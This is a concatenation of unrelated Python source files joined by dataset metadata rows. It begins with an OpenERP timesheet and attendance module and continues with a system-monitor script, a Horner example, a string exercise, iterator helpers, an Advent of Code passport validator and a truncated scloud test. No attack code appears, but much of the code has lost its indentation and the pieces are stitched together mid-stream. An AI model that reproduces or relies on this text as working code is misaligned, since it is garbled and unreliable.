if vals.get('attendances_ids'):
# If attendances, we sort them by date asc before writing them, to satisfy the alternance constraint
# In addition to the date order, deleting attendances are done before inserting attendances
vals['attendances_ids'] = self.sort_attendances(cr, uid, vals['attendances_ids'], context=context)
res = super(hr_timesheet_sheet, self).write(cr, uid, ids, vals, context=context)
if vals.get('attendances_ids'):
for timesheet in self.browse(cr, uid, ids):
if not self.pool['hr.attendance']._altern_si_so(cr, uid, [att.id for att in timesheet.attendances_ids]):
raise osv.except_osv(_('Warning !'), _('Error ! Sign in (resp. Sign out) must follow Sign out (resp. Sign in)'))
return res
def sort_attendances(self, cr, uid, attendance_tuples, context=None):
date_attendances = []
for att_tuple in attendance_tuples:
if att_tuple[0] in [0,1,4]:
if att_tuple[0] in [0,1]:
name = att_tuple[2]['name']
else:
name = self.pool['hr.attendance'].browse(cr, uid, att_tuple[1]).name
date_attendances.append((1, name, att_tuple))
elif att_tuple[0] in [2,3]:
date_attendances.append((0, self.pool['hr.attendance'].browse(cr, uid, att_tuple[1]).name, att_tuple))
else:
date_attendances.append((0, False, att_tuple))
date_attendances.sort()
return [att[2] for att in date_attendances]
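    # Note (added for clarity): the attendance tuples follow the usual OpenERP
    # one2many command convention -- (0, 0, vals) create, (1, id, vals) update,
    # (2, id) delete, (3, id) unlink, (4, id) link -- so commands in [0, 1, 4]
    # carry a date to sort on, while removals in [2, 3] are ordered first.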
def button_confirm(self, cr, uid, ids, context=None):
for sheet in self.browse(cr, uid, ids, context=context):
if sheet.employee_id and sheet.employee_id.parent_id and sheet.employee_id.parent_id.user_id:
self.message_subscribe_users(cr, uid, [sheet.id], user_ids=[sheet.employee_id.parent_id.user_id.id], context=context)
self.check_employee_attendance_state(cr, uid, sheet.id, context=context)
di = sheet.user_id.company_id.timesheet_max_difference
if (abs(sheet.total_difference) < di) or not di:
wf_service = netsvc.LocalService("workflow")
wf_service.trg_validate(uid, 'hr_timesheet_sheet.sheet', sheet.id, 'confirm', cr)
else:
raise osv.except_osv(_('Warning!'), _('Please verify that the total difference of the sheet is lower than %.2f.') %(di,))
return True
def attendance_action_change(self, cr, uid, ids, context=None):
hr_employee = self.pool.get('hr.employee')
employee_ids = []
for sheet in self.browse(cr, uid, ids, context=context):
if sheet.employee_id.id not in employee_ids: employee_ids.append(sheet.employee_id.id)
return hr_employee.attendance_action_change(cr, uid, employee_ids, context=context)
_columns = {
'name': fields.char('Note', size=64, select=1,
states={'confirm':[('readonly', True)], 'done':[('readonly', True)]}),
'employee_id': fields.many2one('hr.employee', 'Employee', required=True),
'user_id': fields.related('employee_id', 'user_id', type="many2one", relation="res.users", store=True, string="User", required=False, readonly=True),#fields.many2one('res.users', 'User', required=True, select=1, states={'confirm':[('readonly', True)], 'done':[('readonly', True)]}),
'date_from': fields.date('Date from', required=True, select=1, readonly=True, states={'new':[('readonly', False)]}),
'date_to': fields.date('Date to', required=True, select=1, readonly=True, states={'new':[('readonly', False)]}),
'timesheet_ids' : fields.one2many('hr.analytic.timesheet', 'sheet_id',
'Timesheet lines',
readonly=True, states={
'draft': [('readonly', False)],
'new': [('readonly', False)]}
),
'attendances_ids' : fields.one2many('hr.attendance', 'sheet_id', 'Attendances'),
'state' : fields.selection([
('new', 'New'),
('draft','Open'),
('confirm','Waiting Approval'),
('done','Approved')], 'Status', select=True, required=True, readonly=True,
help=' * The \'Draft\' status is used when a user is encoding a new and unconfirmed timesheet. \
                \n* The \'Confirmed\' status is used when the user confirms the timesheet. \
                \n* The \'Done\' status is used when the user\'s timesheet is accepted by his/her senior.'),
'state_attendance' : fields.related('employee_id', 'state', type='selection', selection=[('absent', 'Absent'), ('present', 'Present')], string='Current Status', readonly=True),
'total_attendance': fields.function(_total, method=True, string='Total Attendance', multi="_total"),
'total_timesheet': fields.function(_total, method=True, string='Total Timesheet', multi="_total"),
'total_difference': fields.function(_total, method=True, string='Difference', multi="_total"),
'period_ids': fields.one2many('hr_timesheet_sheet.sheet.day', 'sheet_id', 'Period', readonly=True),
'account_ids': fields.one2many('hr_timesheet_sheet.sheet.account', 'sheet_id', 'Analytic accounts', readonly=True),
'company_id': fields.many2one('res.company', 'Company'),
'department_id':fields.many2one('hr.department','Department'),
}
def _default_date_from(self, cr, uid, context=None):
user = self.pool.get('res.users').browse(cr, uid, uid, context=context)
r = user.company_id and user.company_id.timesheet_range or 'month'
if r=='month':
return time.strftime('%Y-%m-01')
elif r=='week':
return (datetime.today() + relativedelta(weekday=0, days=-6)).strftime('%Y-%m-%d')
elif r=='year':
return time.strftime('%Y-01-01')
return time.strftime('%Y-%m-%d')
def _default_date_to(self, cr, uid, context=None):
user = self.pool.get('res.users').browse(cr, uid, uid, context=context)
r = user.company_id and user.company_id.timesheet_range or 'month'
if r=='month':
return (datetime.today() + relativedelta(months=+1,day=1,days=-1)).strftime('%Y-%m-%d')
elif r=='week':
return (datetime.today() + relativedelta(weekday=6)).strftime('%Y-%m-%d')
elif r=='year':
return time.strftime('%Y-12-31')
return time.strftime('%Y-%m-%d')
def _default_employee(self, cr, uid, context=None):
emp_ids = self.pool.get('hr.employee').search(cr, uid, [('user_id','=',uid)], context=context)
return emp_ids and emp_ids[0] or False
_defaults = {
'date_from' : _default_date_from,
'date_to' : _default_date_to,
'state': 'new',
'employee_id': _default_employee,
'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'hr_timesheet_sheet.sheet', context=c)
}
def _sheet_date(self, cr, uid, ids, forced_user_id=False, context=None):
for sheet in self.browse(cr, uid, ids, context=context):
new_user_id = forced_user_id or sheet.user_id and sheet.user_id.id
if new_user_id:
cr.execute('SELECT id \
FROM hr_timesheet_sheet_sheet \
WHERE (date_from <= %s and %s <= date_to) \
AND user_id=%s \
AND id <> %s',(sheet.date_to, sheet.date_from, new_user_id, sheet.id))
if cr.fetchall():
return False
return True
_constraints = [
(_sheet_date, 'You cannot have 2 timesheets that overlap!\nPlease use the menu \'My Current Timesheet\' to avoid this problem.', ['date_from','date_to']),
]
def action_set_to_draft(self, cr, uid, ids, *args):
self.write(cr, uid, ids, {'state': 'draft'})
wf_service = netsvc.LocalService('workflow')
for id in ids:
wf_service.trg_create(uid, self._name, id, cr)
return True
def name_get(self, cr, uid, ids, context=None):
if not ids:
return []
if isinstance(ids, (long, int)):
ids = [ids]
return [(r['id'], _('Week ')+datetime.strptime(r['date_from'], '%Y-%m-%d').strftime('%U')) \
for r in self.read(cr, uid, ids, ['date_from'],
context=context, load='_classic_write')]
def unlink(self, cr, uid, ids, context=None):
sheets = self.read(cr, uid, ids, ['state','total_attendance'], context=context)
for sheet in sheets:
if sheet['state'] in ('confirm', 'done'):
raise osv.except_osv(_('Invalid Action!'), _('You cannot delete a timesheet which is already confirmed.'))
            elif sheet['total_attendance'] != 0.00:
                raise osv.except_osv(_('Invalid Action!'), _('You cannot delete a timesheet which has attendance entries.'))
return super(hr_timesheet_sheet, self).unlink(cr, uid, ids, context=context)
def onchange_employee_id(self, cr, uid, ids, employee_id, context=None):
department_id = False
user_id = False
if employee_id:
empl_id = self.pool.get('hr.employee').browse(cr, uid, employee_id, context=context)
department_id = empl_id.department_id.id
user_id = empl_id.user_id.id
return {'value': {'department_id': department_id, 'user_id': user_id,}}
# ------------------------------------------------
# OpenChatter methods and notifications
# ------------------------------------------------
def _needaction_domain_get(self, cr, uid, context=None):
emp_obj = self.pool.get('hr.employee')
empids = emp_obj.search(cr, uid, [('parent_id.user_id', '=', uid)], context=context)
if not empids:
return False
dom = ['&', ('state', '=', 'confirm'), ('employee_id', 'in', empids)]
return dom
class account_analytic_line(osv.osv):
_inherit = "account.analytic.line"
def _get_default_date(self, cr, uid, context=None):
if context is None:
context = {}
#get the default date (should be: today)
res = super(account_analytic_line, self)._get_default_date(cr, uid, context=context)
#if we got the dates from and to from the timesheet and if the default date is in between, we use the default
#but if the default isn't included in those dates, we use the date start of the timesheet as default
if context.get('timesheet_date_from') and context.get('timesheet_date_to'):
if context['timesheet_date_from'] <= res <= context['timesheet_date_to']:
return res
return context.get('timesheet_date_from')
#if we don't get the dates from the timesheet, we return the default value from super()
return res
class hr_timesheet_line(osv.osv):
_inherit = "hr.analytic.timesheet"
def _sheet(self, cursor, user, ids, name, args, context=None):
sheet_obj = self.pool.get('hr_timesheet_sheet.sheet')
res = {}.fromkeys(ids, False)
for ts_line in self.browse(cursor, user, ids, context=context):
sheet_ids = sheet_obj.search(cursor, user,
[('date_to', '>=', ts_line.date), ('date_from', '<=', ts_line.date),
('employee_id.user_id', '=', ts_line.user_id.id)],
context=context)
if sheet_ids:
# [0] because only one sheet possible for an employee between 2 dates
res[ts_line.id] = sheet_obj.name_get(cursor, user, sheet_ids, context=context)[0]
return res
def _get_hr_timesheet_sheet(self, cr, uid, ids, context=None):
ts_line_ids = []
for ts in self.browse(cr, uid, ids, context=context):
cr.execute("""
SELECT l.id
FROM hr_analytic_timesheet l
INNER JOIN account_analytic_line al
ON (l.line_id = al.id)
WHERE %(date_to)s >= al.date
AND %(date_from)s <= al.date
AND %(user_id)s = al.user_id
GROUP BY l.id""", {'date_from': ts.date_from,
'date_to': ts.date_to,
'user_id': ts.employee_id.user_id.id,})
ts_line_ids.extend([row[0] for row in cr.fetchall()])
return ts_line_ids
def _get_account_analytic_line(self, cr, uid, ids, context=None):
ts_line_ids = self.pool.get('hr.analytic.timesheet').search(cr, uid, [('line_id', 'in', ids)])
return ts_line_ids
_columns = {
'sheet_id': fields.function(_sheet, string='Sheet', select="1",
type='many2one', relation='hr_timesheet_sheet.sheet', ondelete="cascade",
store={
'hr_timesheet_sheet.sheet': (_get_hr_timesheet_sheet, ['employee_id', 'date_from', 'date_to'], 10),
'account.analytic.line': (_get_account_analytic_line, ['user_id', 'date'], 10),
'hr.analytic.timesheet': (lambda self,cr,uid,ids,context=None: ids, None, 10),
},
),
}
def _check_sheet_state(self, cr, uid, ids, context=None):
if context is None:
context = {}
for timesheet_line in self.browse(cr, uid, ids, context=context):
if timesheet_line.sheet_id and timesheet_line.sheet_id.state not in ('draft', 'new'):
return False
return True
_constraints = [
(_check_sheet_state, 'You cannot modify an entry in a Confirmed/Done timesheet !', ['state']),
]
def unlink(self, cr, uid, ids, *args, **kwargs):
if isinstance(ids, (int, long)):
ids = [ids]
self._check(cr, uid, ids)
return super(hr_timesheet_line,self).unlink(cr, uid, ids,*args, **kwargs)
def _check(self, cr, uid, ids):
for att in self.browse(cr, uid, ids):
if att.sheet_id and att.sheet_id.state not in ('draft', 'new'):
raise osv.except_osv(_('Error!'), _('You cannot modify an entry in a confirmed timesheet.'))
return True
def multi_on_change_account_id(self, cr, uid, ids, account_ids, context=None):
return dict([(el, self.on_change_account_id(cr, uid, ids, el, context.get('user_id', uid))) for el in account_ids])
hr_timesheet_line()
class hr_attendance(osv.osv):
_inherit = "hr.attendance"
def _get_default_date(self, cr, uid, context=None):
if context is None:
context = {}
if 'name' in context:
return context['name'] + time.strftime(' %H:%M:%S')
return time.strftime('%Y-%m-%d %H:%M:%S')
def _get_hr_timesheet_sheet(self, cr, uid, ids, context=None):
attendance_ids = []
for ts in self.browse(cr, uid, ids, context=context):
cr.execute("""
SELECT a.id
FROM hr_attendance a
INNER JOIN hr_employee e
INNER JOIN resource_resource r
ON (e.resource_id = r.id)
ON (a.employee_id = e.id)
WHERE %(date_to)s >= date_trunc('day', a.name)
AND %(date_from)s <= a.name
AND %(user_id)s = r.user_id
GROUP BY a.id""", {'date_from': ts.date_from,
'date_to': ts.date_to,
'user_id': ts.employee_id.user_id.id,})
attendance_ids.extend([row[0] for row in cr.fetchall()])
return attendance_ids
def _get_attendance_employee_tz(self, cr, uid, employee_id, date, context=None):
""" Simulate timesheet in employee timezone
Return the attendance date in string format in the employee
tz converted from utc timezone as we consider date of employee
timesheet is in employee timezone
"""
employee_obj = self.pool['hr.employee']
tz = False
if employee_id:
employee = employee_obj.browse(cr, uid, employee_id, context=context)
tz = employee.user_id.partner_id.tz
if not date:
date = time.strftime(DEFAULT_SERVER_DATETIME_FORMAT)
att_tz = timezone(tz or 'utc')
attendance_dt = datetime.strptime(date, DEFAULT_SERVER_DATETIME_FORMAT)
att_tz_dt = pytz.utc.localize(attendance_dt)
att_tz_dt = att_tz_dt.astimezone(att_tz)
        # We keep only the date, omitting the hours, because we compare it with the
        # timesheet's date_from, which is a date field; keeping the hours would put
        # the value outside the timesheet's date range
att_tz_date_str = datetime.strftime(att_tz_dt, DEFAULT_SERVER_DATE_FORMAT)
return att_tz_date_str
def _get_current_sheet(self, cr, uid, employee_id, date=False, context=None):
sheet_obj = self.pool['hr_timesheet_sheet.sheet']
if not date:
date = time.strftime(DEFAULT_SERVER_DATETIME_FORMAT)
att_tz_date_str = self._get_attendance_employee_tz(
cr, uid, employee_id,
date=date, context=context)
sheet_ids = sheet_obj.search(cr, uid,
[('date_from', '<=', att_tz_date_str),
('date_to', '>=', att_tz_date_str),
('employee_id', '=', employee_id)],
limit=1, context=context)
return sheet_ids and sheet_ids[0] or False
def _sheet(self, cursor, user, ids, name, args, context=None):
res = {}.fromkeys(ids, False)
for attendance in self.browse(cursor, user, ids, context=context):
res[attendance.id] = self._get_current_sheet(
cursor, user, attendance.employee_id.id, attendance.name,
context=context)
return res
_columns = {
'sheet_id': fields.function(_sheet, string='Sheet',
type='many2one', relation='hr_timesheet_sheet.sheet',
store={
'hr_timesheet_sheet.sheet': (_get_hr_timesheet_sheet, ['employee_id', 'date_from', 'date_to'], 10),
'hr.attendance': (lambda self,cr,uid,ids,context=None: ids, ['employee_id', 'name', 'day'], 10),
},
)
}
_defaults = {
'name': _get_default_date,
}
def create(self, cr, uid, vals, context=None):
if context is None:
context = {}
sheet_id = context.get('sheet_id') or self._get_current_sheet(cr, uid, vals.get('employee_id'), vals.get('name'), context=context)
if sheet_id:
att_tz_date_str = self._get_attendance_employee_tz(
cr, uid, vals.get('employee_id'),
date=vals.get('name'), context=context)
ts = self.pool.get('hr_timesheet_sheet.sheet').browse(cr, uid, sheet_id, context=context)
if ts.state not in ('draft', 'new'):
raise osv.except_osv(_('Error!'), _('You can not enter an attendance in a submitted timesheet. Ask your manager to reset it before adding attendance.'))
elif ts.date_from > att_tz_date_str or ts.date_to < att_tz_date_str:
raise osv.except_osv(_('User Error!'), _('You can not enter an attendance date outside the current timesheet dates.'))
return super(hr_attendance,self).create(cr, uid, vals, context=context)
def unlink(self, cr, uid, ids, *args, **kwargs):
if isinstance(ids, (int, long)):
ids = [ids]
self._check(cr, uid, ids)
return super(hr_attendance,self).unlink(cr, uid, ids,*args, **kwargs)
def write(self, cr, uid, ids, vals, context=None):
if context is None:
context = {}
if isinstance(ids, (int, long)):
ids = [ids]
self._check(cr, uid, ids)
res = super(hr_attendance,self).write(cr, uid, ids, vals, context=context)
if 'sheet_id' in context:
for attendance in self.browse(cr, uid, ids, context=context):
if context['sheet_id'] != attendance.sheet_id.id:
raise osv.except_osv(_('User Error!'), _('You cannot enter an attendance ' \
'date outside the current timesheet dates.'))
return res
def _check(self, cr, uid, ids):
for att in self.browse(cr, uid, ids):
if att.sheet_id and att.sheet_id.state not in ('draft', 'new'):
raise osv.except_osv(_('Error!'), _('You cannot modify an entry in a confirmed timesheet'))
return True
hr_attendance()
class hr_timesheet_sheet_sheet_day(osv.osv):
_name = "hr_timesheet_sheet.sheet.day"
_description = "Timesheets by Period"
_auto = False
_order='name'
_columns = {
'name': fields.date('Date', readonly=True),
'sheet_id': fields.many2one('hr_timesheet_sheet.sheet', 'Sheet', readonly=True, select="1"),
'total_timesheet': fields.float('Total Timesheet', readonly=True),
'total_attendance': fields.float('Attendance', readonly=True),
'total_difference': fields.float('Difference', readonly=True),
}
def init(self, cr):
cr.execute("""create or replace view hr_timesheet_sheet_sheet_day as
SELECT
id,
name,
sheet_id,
total_timesheet,
total_attendance,
cast(round(cast(total_attendance - total_timesheet as Numeric),2) as Double Precision) AS total_difference
FROM
((
SELECT
MAX(id) as id,
name,
sheet_id,
SUM(total_timesheet) as total_timesheet,
CASE WHEN SUM(total_attendance) < 0
THEN (SUM(total_attendance) +
CASE WHEN current_date <> name
THEN 1440
ELSE (EXTRACT(hour FROM current_time AT TIME ZONE 'UTC') * 60) + EXTRACT(minute FROM current_time AT TIME ZONE 'UTC')
END
)
ELSE SUM(total_attendance)
END /60 as total_attendance
FROM
((
select
min(hrt.id) as id,
l.date::date as name,
s.id as sheet_id,
sum(l.unit_amount) as total_timesheet,
0.0 as total_attendance
from
hr_analytic_timesheet hrt
JOIN account_analytic_line l ON l.id = hrt.line_id
LEFT JOIN hr_timesheet_sheet_sheet s ON s.id = hrt.sheet_id
group by l.date::date, s.id
) union (
select
-min(a.id) as id,
a.name::date as name,
s.id as sheet_id,
0.0 as total_timesheet,
SUM(((EXTRACT(hour FROM a.name) * 60) + EXTRACT(minute FROM a.name)) * (CASE WHEN a.action = 'sign_in' THEN -1 ELSE 1 END)) as total_attendance
from
hr_attendance a
LEFT JOIN hr_timesheet_sheet_sheet s
ON s.id = a.sheet_id
WHERE action in ('sign_in', 'sign_out')
group by a.name::date, s.id
)) AS foo
GROUP BY name, sheet_id
)) AS bar""")
hr_timesheet_sheet_sheet_day()
class hr_timesheet_sheet_sheet_account(osv.osv):
_name = "hr_timesheet_sheet.sheet.account"
_description = "Timesheets by Period"
_auto = False
_order='name'
_columns = {
'name': fields.many2one('account.analytic.account', 'Project / Analytic Account', readonly=True),
'sheet_id': fields.many2one('hr_timesheet_sheet.sheet', 'Sheet', readonly=True),
'total': fields.float('Total Time', digits=(16,2), readonly=True),
'invoice_rate': fields.many2one('hr_timesheet_invoice.factor', 'Invoice rate', readonly=True),
}
def init(self, cr):
cr.execute("""create or replace view hr_timesheet_sheet_sheet_account as (
select
min(hrt.id) as id,
l.account_id as name,
s.id as sheet_id,
sum(l.unit_amount) as total,
l.to_invoice as invoice_rate
from
hr_analytic_timesheet hrt
left join (account_analytic_line l
LEFT JOIN hr_timesheet_sheet_sheet s
ON (s.date_to >= l.date
AND s.date_from <= l.date
AND s.user_id = l.user_id))
on (l.id = hrt.line_id)
group by l.account_id, s.id, l.to_invoice
)""")
hr_timesheet_sheet_sheet_account()
class res_company(osv.osv):
_inherit = 'res.company'
_columns = {
'timesheet_range': fields.selection(
[('day','Day'),('week','Week'),('month','Month')], 'Timesheet range',
help="Periodicity on which you validate your timesheets."),
'timesheet_max_difference': fields.float('Timesheet allowed difference(Hours)',
help="Allowed difference in hours between the sign in/out and the timesheet " \
"computation for one sheet. Set this to 0 if you do not want any control."),
}
_defaults = {
'timesheet_range': lambda *args: 'week',
'timesheet_max_difference': lambda *args: 0.0
}
res_company()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| 50.580286 | 290 | 0.58595 |
5d7b30ee6755513b630ed79ce0ddd64d0708b094 | 1,125 | py | Python | main.py | rajat004/py_watch | 4b39d0d6d5084efb04492c38ada3063b837803c3 | [
"MIT"
] | null | null | null | main.py | rajat004/py_watch | 4b39d0d6d5084efb04492c38ada3063b837803c3 | [
"MIT"
] | null | null | null | main.py | rajat004/py_watch | 4b39d0d6d5084efb04492c38ada3063b837803c3 | [
"MIT"
] | null | null | null | from activity_monitor.cpu import CpuMonitor
from activity_monitor.memory import MemoryMonitor
from config import CPUConstants, MemConstants, ActivityNames, REST_INTERVAL
import time
from datetime import datetime
from core.notification import Notification
import logging
logger = logging.getLogger(__name__)
def service():
cpu_monitor = CpuMonitor(threshold_low=CPUConstants.low.value, threshold_high=CPUConstants.high.value,
activity_name=ActivityNames.cpu.value, current_value=0)
mem_monitor = MemoryMonitor(threshold_low=MemConstants.low.value, threshold_high=MemConstants.high.value,
activity_name=ActivityNames.memory.value, current_value=0)
    while True:
logger.info('sleeping at {0} !'.format(datetime.now()))
time.sleep(REST_INTERVAL)
logger.info('woke up at {0} !'.format(datetime.now()))
cpu_activity = cpu_monitor.monitor_activity()
mem_activity = mem_monitor.monitor_activity()
Notification.send_notifications([mem_activity, cpu_activity])
if __name__ == '__main__':
service()
| 32.142857 | 109 | 0.728 |
1c1fff7fca4bd41bd722972474c9e2dc15665428 | 616 | py | Python | algo-c-to-_/examples/horner_.py | nobi56/aRepo | 4d444647ceedd239a1bc37bfa31ba8f204fca0ef | [
"CC0-1.0"
] | null | null | null | algo-c-to-_/examples/horner_.py | nobi56/aRepo | 4d444647ceedd239a1bc37bfa31ba8f204fca0ef | [
"CC0-1.0"
] | null | null | null | algo-c-to-_/examples/horner_.py | nobi56/aRepo | 4d444647ceedd239a1bc37bfa31ba8f204fca0ef | [
"CC0-1.0"
] | null | null | null | #
# from src/horner.c
#
# double horner(int, double a[], double) to horner
#
from horner import horner
def fmt(a):
assert len(a) > 0, "ERROR: 'a' must be a list/tuple that contains at least one element."
r = []
for i in range(len(a)-1, 1, -1):
r.append("{0} * x^{1}".format(a[i], i))
if len(a) >= 2:
r.append("{0} * x".format(a[1]))
r.append(str(a[0]))
return "f(x) = {0}".format(" + ".join(r))
a = (1, 2, 3, 4, 5)
print(fmt(a))
print("f({0}) = {1}".format(2, horner(a,2)))
print("f({0}) = {1}".format(11, horner(a,11)))
print("f({0}) = {1}".format(121, horner(a,121)))
| 23.692308 | 92 | 0.527597 |
20c1cfaa3bd5cc9e9c68592774b6e25f3c1ef0c9 | 450 | py | Python | __pythonBuildSpecialString.py | simdevex/01.Basics | cf4f372384e66f4b26e4887d2f5d815a1f8e929c | [
"MIT"
] | null | null | null | __pythonBuildSpecialString.py | simdevex/01.Basics | cf4f372384e66f4b26e4887d2f5d815a1f8e929c | [
"MIT"
] | null | null | null | __pythonBuildSpecialString.py | simdevex/01.Basics | cf4f372384e66f4b26e4887d2f5d815a1f8e929c | [
"MIT"
] | null | null | null | '''
Python program to get a new string from a given string where "Is" has been added to the front.
If the given string already begins with "Is" then return the string unchanged.
'''
def checkString (inputString =''):
if inputString[0:2] == "Is":
return inputString
else:
return "Is " + inputString
def main():
myString = input ("Please type a sentence: ")
print (checkString (myString))
main ()
| 23.684211 | 94 | 0.633333 |
509da87fe0bab7f407ba2c2300c36c1399352288 | 3,233 | py | Python | common/enumerable.py | GitKlip/python-common | b44d1aaba5db3e1aa571b189999a8edea54c96bb | [
"MIT"
] | null | null | null | common/enumerable.py | GitKlip/python-common | b44d1aaba5db3e1aa571b189999a8edea54c96bb | [
"MIT"
] | null | null | null | common/enumerable.py | GitKlip/python-common | b44d1aaba5db3e1aa571b189999a8edea54c96bb | [
"MIT"
] | null | null | null | from collections import defaultdict
from itertools import chain
from itertools import combinations
from itertools import islice
from itertools import tee
import sys
def group_by(func, values):
""" Groups values by func.
Returns
(dict): Keys produced by func pointing to lists of the values grouped.
"""
groups = defaultdict(list)
for value in values:
groups[func(value)].append(value)
return dict(groups)
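# Example: group_by(len, ["a", "bb", "cc"]) == {1: ["a"], 2: ["bb", "cc"]}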
def index_by(func, values):
""" Indexes values by func.
Returns
(dict): Keys produced by func, each pointing to one value.
"""
return {func(value): value for value in values}
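# Example: index_by(str.upper, ["a", "b"]) == {"A": "a", "B": "b"}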
def each_cons(size, iterable):
""" Moves a sliding window along the iterable and yields consecutive windows.
Example:
for window in each_cons(3, [1,2,3,4,5]):
            print(window)
        # output:
        (1, 2, 3)
        (2, 3, 4)
        (3, 4, 5)
Taken from: https://stackoverflow.com/a/54110047/422075
"""
iterators = tee(iterable, size)
iterators = [islice(iterator, i, None) for i, iterator in enumerate(iterators)]
yield from zip(*iterators)
def each_slice(size, iterable):
""" Chunks the iterable into size elements at a time, each yielded as a list.
Example:
for chunk in each_slice(2, [1,2,3,4,5]):
print(chunk)
# output:
[1, 2]
[3, 4]
[5]
"""
current_slice = []
for item in iterable:
current_slice.append(item)
if len(current_slice) >= size:
yield current_slice
current_slice = []
if current_slice:
yield current_slice
def each_slice_or_size(iterable, max_len: int, max_bytes: float):
current_slice = []
for item in iterable:
if sys.getsizeof(current_slice) + sys.getsizeof(item) >= max_bytes:
yield current_slice
current_slice = []
current_slice.append(item)
if len(current_slice) >= max_len:
yield current_slice
current_slice = []
if current_slice:
yield current_slice
def all_combinations(iterable, min_size=1, max_size=None):
""" Returns combinations of all lengths up to the size of iterable.
Args:
iterable (iterable): Anything that can be turned into a list.
min_size (int): The min size of a combination.
max_size (int): The max size of a combination. If None, defaults to
len(list(iterable)).
Returns:
(iterator): An iterator returning all requested combinations.
Example:
iterator = all_combinations([1, 2, 3])
# output of list(iterator):
[(1,), (2,), (3,), (1, 2), (1, 3), (2, 3), (1, 2, 3)]
"""
min_size = max(min_size, 0)
as_list = list(iterable)
size = len(as_list)
max_size = size if max_size is None else max_size
max_size = min(size, max_size)
return chain.from_iterable(combinations(as_list, size) for size in range(min_size, max_size + 1))
def compact(iterable, generator=False):
""" Returns a list where all None values have been discarded. """
if generator:
return (val for val in iterable if val is not None)
else:
return [val for val in iterable if val is not None]
| 26.941667 | 101 | 0.628518 |
283fa3bacea06cb6cfdf18edb591b4b66af2ff8c | 3,619 | py | Python | 2020/04.py | MastProTech/Advent-of-Code | 3ffdb9b0cfcca72084cc8fd6e2e9a431443dd3dc | [
"MIT"
] | 1 | 2020-12-05T12:55:10.000Z | 2020-12-05T12:55:10.000Z | 2020/04.py | MastProTech/Advent-of-Code | 3ffdb9b0cfcca72084cc8fd6e2e9a431443dd3dc | [
"MIT"
] | null | null | null | 2020/04.py | MastProTech/Advent-of-Code | 3ffdb9b0cfcca72084cc8fd6e2e9a431443dd3dc | [
"MIT"
] | null | null | null | import re
from runner import read_file
def extract_keys_values(text:str)->list: # Separates each passport, and then each passport's keys and values
t_list=re.split('\n{2}', text)
t_list=list(map(str.split, t_list))
output=list()
for i in range(len(t_list)):
output.append([])
for j in range(len(t_list[i])):
output[i].append(t_list[i][j].split(':'))
output[i]=dict(output[i])
return output
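# Example of the expected puzzle-input format (passports separated by blank lines,
# fields given as key:value pairs split across spaces and newlines):
#   ecl:gry pid:860033327 eyr:2020 hcl:#fffffd
#   byr:1937 iyr:2017 cid:147 hgt:183cm
# which extract_keys_values turns into
#   [{'ecl': 'gry', 'pid': '860033327', 'eyr': '2020', 'hcl': '#fffffd',
#     'byr': '1937', 'iyr': '2017', 'cid': '147', 'hgt': '183cm'}]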
def return_passport_validity_part1(l:list)->bool:
i=l.keys()
if 'ecl' in i and 'pid' in i and 'eyr' in i and 'hcl' in i and 'byr' in i and 'iyr' in i and 'hgt' in i:
return True
return False
def verify(key:str, val:str)->bool: # Verifies if keys are assigned valid values or not
if key=='byr':
if int(val)>=1920 and int(val)<=2002:
return True
elif key=='iyr':
if int(val)>=2010 and int(val)<=2020:
return True
elif key=='eyr':
if int(val)>=2020 and int(val)<=2030:
return True
elif key=='hgt':
if val[-2:]=='cm':
if int(val[:-2])>=150 and int(val[:-2])<=193:
return True
elif val[-2:]=='in':
if int(val[:-2])>=59 and int(val[:-2])<=76:
return True
elif key=='hcl':
match=re.match('^#[0-9a-f]{6}$', val)
if match is not None:
return True
elif key=='ecl':
ecl=['amb', 'blu', 'brn', 'gry', 'grn', 'hzl', 'oth']
if val in ecl:
return True
elif key=='pid':
match=re.match('^[0-9]{9}$', val)
if match is not None:
return True
return False
def return_passport_validity_part2(l:list)->bool:
i=l.keys()
if (
('byr' in i and verify('byr', l['byr'])) and
('iyr' in i and verify('iyr', l['iyr'])) and
('eyr' in i and verify('eyr', l['eyr'])) and
('hgt' in i and verify('hgt', l['hgt'])) and
('hcl' in i and verify('hcl', l['hcl'])) and
('ecl' in i and verify('ecl', l['ecl'])) and
('pid' in i and verify('pid', l['pid']))):
return True
return False
def clone_part2(l:list)->bool: # NOTE: This function was copied from https://www.reddit.com/r/adventofcode/comments/k6e8sw/2020_day_04_solutions/gemhjlu/
valid=False
fields_required={'byr', 'iyr', 'eyr', 'hgt', 'hcl', 'ecl', 'pid'}
field_pattern = {'byr': '(^(19)[2-9][0-9]$)|(^(200)[0-2]$)',
'iyr': '(^(201)[0-9]$)|(^(2020)$)',
'eyr': '(^(202)[0-9]$)|(^(2030)$)',
'hgt': '(^((1[5-8][0-9])|((19)[0-3]))cm$)|(^((59)|(6[0-9])|(7[0-6]))in$)',
'hcl': '^#[0-9a-f]{6}$',
'ecl': '(^amb$)|(^blu$)|(^brn$)|(^gry$)|(^grn$)|(^hzl$)|(^oth$)',
'pid': '^[0-9]{9}$',
'cid': '(.*?)'}
if fields_required.issubset(l.keys()):
valid=True
for key in l.keys():
valid=valid and bool(re.match(field_pattern[key], l[key]))
return valid
if __name__=='__main__':
text=read_file('04.txt')
output=extract_keys_values(text)
print('Total Passports:',len(output))
print('Part 1: Valid Passports:',list(map(return_passport_validity_part1, output)).count(True))
print('Part 2: Valid Passports:',list(map(return_passport_validity_part2, output)).count(True))
print('Part 2: (Using another function):',list(map(clone_part2, output)).count(True)) # One of the best solutions I found on the internet. ♥ Source: https://www.reddit.com/r/adventofcode/comments/k6e8sw/2020_day_04_solutions/gemhjlu/ | 41.125 | 237 | 0.539652 |
3bae9a7aa83d43f6d71f5b9fac9a97079f4b1c62 | 3,628 | py | Python | test/scloud/test_appreg.py | harsimranmaan/splunk-cloud-sdk-go | 24fbc60263a158ce57f7f467a95b725656950949 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | test/scloud/test_appreg.py | harsimranmaan/splunk-cloud-sdk-go | 24fbc60263a158ce57f7f467a95b725656950949 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | test/scloud/test_appreg.py | harsimranmaan/splunk-cloud-sdk-go | 24fbc60263a158ce57f7f467a95b725656950949 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | import unittest
import test
def appreg(*args):
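    # Thin wrapper that runs the `scloud appreg <args>` command; callers unpack its result as (exit code, output, error).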
return test.scloud("appreg", *args)
class TestAppregistry(unittest.TestCase):
